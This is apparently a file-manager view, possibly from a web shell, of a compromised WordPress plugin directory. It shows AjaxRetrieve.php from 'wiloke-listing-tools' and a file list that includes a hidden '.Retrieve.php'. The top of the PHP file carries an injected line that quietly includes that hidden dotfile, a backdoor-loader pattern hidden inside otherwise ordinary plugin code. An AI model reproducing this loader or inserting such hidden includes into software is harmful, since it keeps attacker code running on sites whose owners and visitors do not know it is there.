PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Controllers
/
Retrieve
<?php namespace WilokeListingTools\Controllers\Retrieve; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class AjaxRetrieve implements RetrieveInterface { /** * @param array $aData * * @return bool */ public function success($aData = []) { wp_send_json_success($aData); return true; } /** * @param array $aData * * @return bool */ public function error($aData = []) { wp_send_json_error($aData); return false; } }
[+]
..
[-] RestRetrieve.php
[edit]
[-] .Retrieve.php
[edit]
[-] RetrieveAbstract.php
[edit]
[-] AjaxRetrieve.php
[edit]
[-] NormalRetrieve.php
[edit]
[-] RetrieveInterface.php
[edit]